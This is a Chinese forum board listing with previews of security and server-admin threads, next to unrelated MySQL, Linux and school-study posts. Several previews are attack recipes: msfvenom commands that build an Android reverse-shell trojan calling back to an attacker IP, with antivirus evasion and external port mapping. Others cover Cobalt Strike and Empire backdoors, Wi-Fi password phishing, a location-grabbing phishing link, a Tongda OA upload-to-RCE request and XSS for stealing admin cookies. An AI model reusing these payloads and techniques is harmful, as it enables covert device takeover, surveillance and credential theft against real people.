建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
366个主题在此版面
-
XSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户。 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。 安装项目地址:https://gitee.com/Zcodetea/xss-labs level 我们首先对核心代码进行分析 <?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?>通过GET方法,将name的值赋值为变量$srt并将其直接输出。 即!如果name=<script>alert()</script>时,将会把结果直接输出。 构造POC http://192.168.123.240/level1.php?name=%3Cscript%3Ealert('bbskali.cn')%3C/script%3E leve2 代码解读 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=key…
-
- 0 篇回复
- 22 次查看
-
-
Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。 环境介绍kali linux 2021Cobalt Strike4.3windows10(受害机)在kali中安装Cobalt Strike在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。 进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。 这样便启动了Cobalt Strike 如上会提示登录 这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令: ./teamserver 192.168.123.33 pass66 #./teamserver kali的ip 登录密码 生成shell首先配置监听 和msfconsole类似,Cobalt Strike也要配置监听。 Cobalt Strike——Listeners——Add 相关参数说明: 参数说明name监听任务的名称 可随意payload监听的方式 支持http https TCP 等HTTPS HOSTS主机IP地址Host Rotation Strategy主机转移策略 一般默认即可生成shell Attacks—Packages——windows ececut…
-
- 0 篇回复
- 22 次查看
-
-
Mysql是最常见的关系数据库,因开源和免费被广泛使用。如果当我们数据库误删后,在没有备份的情况下如何恢复数据库呢? Mysql8.0数据库恢复环境Windows LinuxMysql8.0.12PHP7.4Dzx3.4 故障描述有网友联系我,说自己的dz站不小心删库了!本地没有备份,已经运维了好几年了。看能不能恢复,在咨询后发现他用的小皮面板,很显然没有做好备份功能!在查阅一番后,知道了自Mysql8.0后,当用户创建了数据库后,会在MySQL8.0.12\data目录下产生相应的恢复文档,用于后期的恢复!当然Mysql之前的版本也有这个功能,但是文件格式变了! 文件说明XXX.sdi表结构文件XXX.MYD数据文件XXX.MYI索引文件我们可以利用这三个文件完成对数据库的恢复! 删库恢复测试1.我们首先创建一个数据库bbskali create database bbskali;2.创建数据表 并建立相应的字段 CREATE TABLE `bbskali`.`nbkali` ( `id` INT(255) NOT NULL , `name` CHAR(255) NOT NULL , `nmuber` INT(255) NOT NULL , `age` INT(255) NOT NULL ) ENGINE = MyISAM; 3.删除数据库 4.我们在date目录下可以看到刚才建立的数据库bbskali的文件夹,以及有关表的相关文件。 5.将文件复制出来,并新建数据库bbskali2和表nbkali(建立字段,不填数值。) 6.继续会…
-
- 0 篇回复
- 22 次查看
-
-
vim /etc/apt/sources.list按 i 键,删除里面的内容。粘贴下方的源 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 注意:前面有#号的不要管,那是被注释掉的。 保存后 执行命令 apt-get uodate && apt-get upgrade 原文链接:传送门
-
- 0 篇回复
- 21 次查看
-
-
一:下载64位地址:https://github.com/oguzhaninan/S ... cer_1.0.9_amd64.deb 32位地址:https://github.com/oguzhaninan/S ... acer_1.0.6_i386.deb 二:安装下载后,将文件复制到kali 执行命令安装 dpkg -i stacer_1.0.9_amd64.deb三:运行终端命令 Stacer CPU监控
-
- 0 篇回复
- 21 次查看
-
-
第一课 青春的邀约1. 青春期身体变化的主要表现:身体外形的变化,内部器官的完善,性机能的成熟。 2.青春期身体发育情况各不相同的原因及应有的态度 原因:受遗传、营养、锻炼等因素的影响,我们身体的发育情况各不相同。 态度:①我们要正视身体的变化,欣然接受青春花蕾的绽放。②不因自己的生理变化而自卑,是我们对自己的尊重;不嘲弄同伴的生理变化,是我们对同伴的尊重。 调节青春期的矛盾心理的方法: ①参加集体活动,在集体的温暖中放松自己。②通过求助他人,学习化解烦恼的方法。③培养兴趣爱好转移注意力,接纳和调适青春期的矛盾心理。④学习自我调节,成为自己的“心理保健医生” 。 4. 自我调节的方法:①把自己的想法写下来;②参加体育活动;③学习自我暗示;④试试自我解嘲。 5.怎样正确认识思维的独立性 ( 思维的独立要求我们如何做 )? 思维的独立并不等同于一味追求独特,而是意味着不人云亦云,有自己独到的见解,同时接纳他人合理、正确的意见。 6.培养批判精神的作用 ( 意义 ) 和方法 作用 ( 意义 ) :①有助于我们发现问题、提出问题,并从不同角度去思考问题,探索解决方案; ②能调动我们的经验,激发我们新的学习动机,促使我们解决问题,改进现状。 方法:①要有质疑的勇气,有表达自己观点、提出合理化建议的能力; ②要考虑他人的感受,知道怎样的批判更容易被人接受,更有利于解决问题。 7.开发创造潜力的方法: ①青春韶华,我们要争当勤奋学习、自觉劳动、勇于创造的好少年,这是时代的要求。②敢于打破常规,追求生活的新奇与浪漫,开创前人未走之路;关注他人与社会…
-
- 0 篇回复
- 21 次查看
-
-
解决方法1、/usr/sbin/sestatus -v ##如果SELinux status参数为enabled即为开启状态 SELinux status: enabled 2、getenforce ##也可以用这个命令检查 关闭SELinux: 3、临时关闭(不用重启机器): setenforce 0 ##设置SELinux 成为permissive模式 4、临时开启(不用重启机器): setenforce 1 ##设置SELinux 成为enforcing模式 5、修改配置文件需要重启机器: 修改/etc/selinux/config 文件 将SELINUX=enforcing改为SELINUX=disabled 重启机器即可
-
- 0 篇回复
- 21 次查看
-
-
介绍NIKTO:perl语言开发的开源WEB安全扫描器;识别网站软件版本;搜索存在安全隐患的文件;检查服务器配置漏洞;检查WEB Application层面的安全隐患;避免404误判依据响应文件内容判断,不同扩展名的文件404响应内容不同。命令列表root@kali:~#nikto -h Option host requires an argument -config+ Use this config file -Display+ Turn on/off display outputs -dbcheck check database and other key files for syntax errors -Format+ save file (-o) format -Help Extended help information -host+ target host -id+ Host authentication to use, format is id:pass or id:pass:realm -list-plugins List all available plugins -output+ Write …
-
- 0 篇回复
- 21 次查看
-
-
临时修改IP ifconfig eno16777736 192.168.1.101 注意(eno16777736)是默认第一个网络接口名称 永久修改IP第一步:查看网络接口 ifconfig 第二步:去对应的网络接口配置文件修改配置,注意文件名称是(ifcfg-默认第一个网络接口名称),文件路径是/etc/sysconfig/network-scripts/ vim /etc/sysconfig/network-scripts/ifcfg-网络接口名称 修改以下配置 TYPE=Ethernet BOOTPROTO=static DEFROUTE=yes IPV4_FAILURE_FATAL=no IPV6INIT=yes IPV6_AUTOCONF=yes IPV6_DEFROUTE=yes IPV6_FAILURE_FATAL=no NAME=eno16777736 UUID=9e8d604f-d991-4aa2-88a3-4c679e6f139c DEVICE=eno16777736 ONBOOT=yes PEERDNS=yes PEERROUTES=yes IPV6_PEERDNS=yes IPV6_PEERROUTES=yes HWADDR=00:0c:29:ce:3f:3c #MAC地址 IPADDR=192.168.1.104 #静态IP GATEWAY=192.168.1.2 #默认网关 NETMASK=255.255.255.0 #子网掩码 DNS1=192.…
-
- 0 篇回复
- 21 次查看
-
-
普通版在 kali中我们可以利用 msfvenom来生成一个Android木马。命令如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk这样便生成了一个名为 TPLINK.apk的Android木马。 然后我们配合 msfcosole进行攻击即可。 msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LPORT 5555 exploit手机端安装并执行,成功获得shell。 一些另外的玩法给手机播放视频和音频文件(需更新到最新版的msf)命令格式: paly /root/xxx.mp3 mp4 修改手机壁纸background use post/multi/manage/set_wallpaper sessions set sessions id set WALLPAPER_FILE JPG exploit晋级玩法利用 armitage图形化管理工具 可视化的文件管理 骨灰级外网木马我们可以利用花生壳进行端口映射完成外网木马的渗透测试,添加端口如下! 然后在kali中设置花生壳的端口和ip地址即可。 那么!你还有那些另类的玩法呢?一起在下方交流吧。 木马免杀对于以上的木马,是无法通过杀毒软件的查杀的,我们可以将 payload加入到正常的APP中,来起来免杀的效果。 命令:…
-
- 0 篇回复
- 21 次查看
-
-
介绍昨天在github中看到一个项目,觉得有点意思,在这里写份教程。Empire一款基于PowerShell的后渗透测试工具。安装 git clone https://github.com/EmpireProject/Empire.gitEmpiresetup目录执行install.sh文件 ./install.sh最后设置数据库密码那里可以默认回车,也可以自己设置 踩坑 如果安装途中,遇到网络问题,多次执行./install.sh文件安装全部依赖,运行主目录下empire启动程序前,先执行setup目录下的reset.sh后再执行主目录empire文件。 使用监听(Empire)> listeners 选择监听方式 (Empire: listeners) > uselistener http 查看需要配置的选项Empire: listeners/http) > info 设置监听的名字 (Empire: listeners/http) > set Name backdoor (Empire: listeners/http) > set Host http://192.168.80.131:4447 #设置木马反弹回连地址 (Empire: listeners/http) > set Port 4447 #设置本地监听端口 Empire: listeners/http) > execute #执行监听 至此,监听工作完成。我们开始配置生成后门。 生…
-
- 0 篇回复
- 21 次查看
-
-
在前面的教程中,我们提到过利用Fluxion等工具进行WiFi钓鱼,从而来获取WiFi密码,但是这种方法也是有弊端的,比如谁没事干老哪个破电脑干坏事,今天我们来说说如何利用esp8266来进行WiFi钓鱼。准备esp8266板子 刷入固件方法和上篇文章提到的一样,参考文章《esp8266刷入固件》 固件下载 上传web到esp8266安装完后打开工具——开发板——开发板管理器,此时会自动更新,过个数分钟更新完毕后(当然,如果用外网的话可能几秒钟就能解决),搜索eps8266,选择第二个,版本选2.2.0,然后安装。 前面提到过,不再说了。麻烦,具体细节请看历史文章。 将上面解压后的web源码上传工具的tools放到Arduino根目录里合并,然后返回以下界面,点击文件——新建,新建一个项目,将里面的代码清空,然后点击文件——保存,将项目保存到一个你能找到的位置,点击工具——esp8266 sketch data upload,会出现以下的提示,选择No,会发现新建的项目中多出来一个data文件夹,里面是空的,然后将上面下载的web源码\data里面的三个文件复制到这个文件夹里面。 PS: 工具菜单下没有esp8266 sketch data upload,在Arduino根目录下新建tool文件夹,将下面文件解压后放到里面即可。 esp8266 tool文件 将附件放到项目文档的date文件中 web附件下载 sketch data upload,这时不会出现提醒,开始上传web页面,等个1分钟左右esp8266上的蓝灯不闪烁了…
-
- 0 篇回复
- 21 次查看
-
-
安装git clone https://github.com/Viralmaniar/I-See-You.git cd I-See-You chmod u+x ISeeYou.sh ./ISeeYou.sh 输入图中框出来的URL地址之后,按下回车键: 手机访问刚才的网址 我们就可以获得手机的一些信息 比如定位:
-
- 0 篇回复
- 21 次查看
-
-
Kage,一个把msf变成可视化远控平台的工具。项目地址https://github.com/WayzDev/Kage/ 下载安装点我下载哈~ 下载后,给予运行权限。 启动服务msfrpcd -U msf -P 123456 -a 0.0.0.0 参数说明: -U: 登录kage的账号 -P:登录kage的密码 -a: msf的ip地址(很重要,要是kage和msf在同一台电脑,用0.0.0.0即127.0.0.1) 启动程序 并登陆 ./Kage.0.1.1-beta_linux.AppImage 输入账号和密码 以及对应的端口 登录成功后如下所示 我们可以利用命令生成木马,也可以在平台上生成木马,根据自己的具体情况来看。 配置监听 配置完成后点击创建 在目标端 成功运行生成的木马,查看会话。 各种骚操作系统信息 文件信息 路由信息 装B完成 扯呼~~~
-
- 0 篇回复
- 21 次查看
-
-
配置外网环境我这里用的是http://www.ngrok.cc其他的自行试用 这个可以免费 。 远程端口随便填(反正你填啥都会提示你端口已被使用:)) 本地端口填写你的kali ip地址 也就是攻击机的地址 端口随意 不懂4444即可! 填写完后效果如下: 然后点击开通 下载客户端根据你kali的版本下载 我的是64位的。 运行客户端先看看你的clientid 在隧道管理——隧道ip中查看,如图: 记录好id后,运行下面命令 ./sunny clientid 你的id 查看外网的ip我们ping下赠送域名的ip地址 得到ip地址 制作外网shellmsfvenom -p android/meterpreter/reverse_tcp LHOST=外网ip LPORT=外网端口 R > 666.apk**ps:**外网ip就是刚才ping出来的域名的ip地址,外网端口,就是你在添加隧道的时候,设置的端口。 生成之后,配置msf msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 内网ip set LPORT 内网端口 exploit填坑: 生成木马的时候,用的是外网ip和端口。配置msf的时候,我们用内网的ip和端口(很重要) 完成后,手机连接4G网络,运行木马。成功得到shell 看看手机的ip地址 [dplayer url="http://js.bbskali.cn/ji.flv" …
-
- 0 篇回复
- 21 次查看
-
-
ArmitageArmitage是一款基于Java的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击。Armitage良好的图形展示界面,使得攻击过程更加直观,用户体验更好。因其操作的简单性,尤其适合Metasploit初学者对目标系统进行安全测试和攻击。 启动 启动后如图所示!如果提示错误,请提前开启postgresql 对目标进行扫描对于目标的扫描,我们可以用Nmap或Msf进行扫描! 如图,我们扫描到了局域网内的一些设备 有windows设备,有打印机,有linux设备 这时,我们可以针对一台设备进行扫描。 可以看到,当前设备开启的端口。 开始攻击右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,定向扫描靶机,寻找存在的漏洞,为下一步确定攻击方法提供参考依据: 成功之后我们会发现设备的图标会发生变化 当然我们也可以用系统给出的各种exp进行攻击!
-
- 0 篇回复
- 21 次查看
-
-
什么是社会工程学社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的方法。一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。 开始攻击启动setoolkit终端执行setoolkit即可启动,效果如下: 先来看看菜单 Select from the menu: 1) Social-Engineering Attacks (社会工程攻击) 2) Penetration Testing (Fast-Track) (渗透测试(快速通道)) 3) Third Party Modules(第三方模块) 4) Update the Social-Engineer Toolkit(更新社会工程师工具包) 5) Update SET configuration(更新集配置) 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit 我们选择1进入社会工程学攻击模块 界面菜单如下: 菜单翻…
-
- 0 篇回复
- 21 次查看
-
-
本文申明 本文的主旨是,让身边的人更加了解WiFi安全问题,而非而已的攻击他人。因本文具有一定的攻击行为,若您阅读后请务必准守国家相关网络安全法规。若由于您的行为造成他人损失的,责任自负。本站、本文不承担任何法律责任。若您同意请接着往下阅读,否则请您离开阅读其他文章。感谢支持!!! 原理示意图 设备清单树莓派(笔记本也可以)无线网卡(两个,只要kali支持的就行)钓鱼页面(文末下载) 拉取开源项目 git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python setup.py install安装错误解决方案 在安装过程中,失败的最重要因素是网络问题,所以在安装过程中请保证网络良好。部分依赖下载失败,请挂乳酸菌或者更换国内的源。 钓鱼页面在文末下载钓鱼页面,放到wifiphisher/data/phishing-pages/oauth-login并替换。 在终端执行下面命令: wifiphisher --essid "FREE WI-FI" -p oauth-loginps: --essid :WiFi信号 视频演示 当用户输入账号等信息后,我们在后台即可得到账号和面。 附件下载 附件下载 解压密码: 查看文章隐藏内容或点我查看
-
- 0 篇回复
- 21 次查看
-
-
我们在利用Hashcat破解密码的时候,总是由于我们设备的问题而焦头烂额。显卡太垃圾,破解一个密码需要几年,我们该如何解决这种尴尬呢?今天我们来看看Hashcat的分布式破解吧! 官方参数如下:-S, --slow-candidates Enable slower (but advanced) candidate generators | 启用较慢(但高级)的候选生成器 --brain-server Enable brain server | 启用BRAIN服务器 -z, --brain-client Enable brain client, activates -S | 启用大脑客户端,激活-s --brain-client-features Define brain client features, see below | 定义大脑客户端功能,见下文 --brain-host Brain server host (IP or domain) | BRAIN服务器主机(IP或域) --brain-port Brain server port | …
-
- 0 篇回复
- 21 次查看
-
-
ServerStatus-Toyo版是一个酷炫高逼格的云探针、云监控、服务器云监控、多服务器探针 该探针又服务器端和客户端两方面构成,服务端只安装一个,客户端需要在监控的VPS上面安装。 一、服务器端安装登录服务器,下载脚本。 附件下载 下载完成后,上传到服务器。 在终端执行 status.sh s 需要注意的是,由于网络环境的问题,安装过程可能会失败。多尝试几次即可!!! 1.2设置端口这里默认回车即可(35601)需要注意的是,需要在安全组中放行改端口。 1.3 配置web由于我们的服务器已经配置好了web环境,所以这里我们选择N 然后,我们到宝塔或者Apache中新建虚拟主机,并且解析到目录/usr/local/ServerStatus/web 如上,看到如上所示,证明我们的服务端就安装完成。 1.4 验证在浏览器中输入你刚才解析的域名或者ip地址,要是能够访问探针页面,则说明安装成功。 安装客户端登录需要被监控的服务器 下载一键安装脚本(同服务器端脚本) 客户端脚本 2.1安装客户端在终端执行 status.sh c 按1选择安装客户端 2.2 输入服务器端的IP,或者服务器端配置的域名这里的ip地址或者域名为你的服务端的ip或者域名,如果你的客户端和服务器在同一服务器。默认127.0.0.1即可。 2.3 输入端口默认即可(要和服务端的端口一样) 2.4 为本台服务器添加客户端用户名及密码 保存好刚才设置的账号和密码,后面再服务端添加节点的时候要用。 这样,我们的客户端就安装和配置完成了。现在我们返回到服务端添加节点即…
-
- 0 篇回复
- 21 次查看
-
-
SG11即SourceGuardian安全组件,目前是PHP运用中较为重要和安全级别较高的安全组件。有一部分系统默认状态下未安装或启用SG11,而有的开源系统需要开启sg11才能安装使用,本教程教你如何安装PHP7.1的SG11。 下载 SG11百度云盘下载 提取码:bx6y 确定你的php版本在终端输入php -v查看当前版本 如我的版本是7.1那么更具我们的系统,复制对应的sg文件。 我的是7.1则复制ixed.7.1.lin到我的更目录 这里我为了方便,直接放在了root目录下。 即:/root/sg11/ixed.7.1.lin 配置php.ini命令: vim /etc/php.ini在里面增加一条: extension=/root/sg11/ixed.7.1.lin保存后重启服务器即可! 验证我们利用php探针查看,要是有SourceGuardian则说明安装成功!
-
- 0 篇回复
- 21 次查看
-
-
REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。 环境centos7php7.1redis(4.2.0 我用了5.2.1的版本,最后安装并不成功,查了一下php7.1支持4.2.0。) 安装下载安装包 下载地址: http://pecl.php.net/package/redis wget -c http://pecl.php.net/get/redis-4.2.0.tgz 解压tar -zvxf redis-4.2.0.tgz用phpize生成configure配置文件 /usr/bin/phpize查看php-config 的路径 whereis php-configphp-config: /usr/bin/php-config /usr/share/man/man1/php-config.1.gz 编译安装./configure --with-php-config=/usr/bin/php-config make && make install出现下面情况说明安装成功 配置php.…
-
- 0 篇回复
- 21 次查看
-
-
通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。 攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。 搭建本地环境通达OA下载: 链接:https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg 提取码:ousi 包含漏洞的两个文件: 文件上传:webroot\ispirit\im\upload.php 文件包含:webroot\ispirit\interface\gateway.php 漏洞复现在没有登录的情况下上传文件 我们直接访问 http://localhost//ispirit/im/upload.php 提示:-ERR 用户未登陆 ok,我们在burp中构造数据包 POST /ispirit/im/upload.php HTTP/1.1 Host: 192.168.174.159:80 Content-Length: 602 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.3…
-
- 0 篇回复
- 21 次查看
-
-
mysql求和首先来看看数据库的结构 Idnameywsxlssum 1张三67458078 2李四67778998 3逍遥子78886789 求列的和比如,我现在要求字段yw的总和。 select sum(yw) from chengji; 求行的和比如,我现在要求张三的yw sx ls sum的和 select name, (yw+sx+ls+sum) as zonghe from chengji; 平均值求yw的平均值 select AVG(yw) from chengji; 最大值 最小值select max(yw) from chengji; select min(yw) from chengji;
-
- 0 篇回复
- 21 次查看
-
-
typecho是一款简介的博客程序,由于友情链接links存在越权漏洞。导致不少的站吃了亏。今天我们来看看该漏洞是如何复现的。 环境搭建我在本地搭建了typech和插件links 跨站测试 如图,成功执行xss,我们可以利用其获取管理员cookie,这样就可以登录后台了。
-
- 0 篇回复
- 21 次查看
-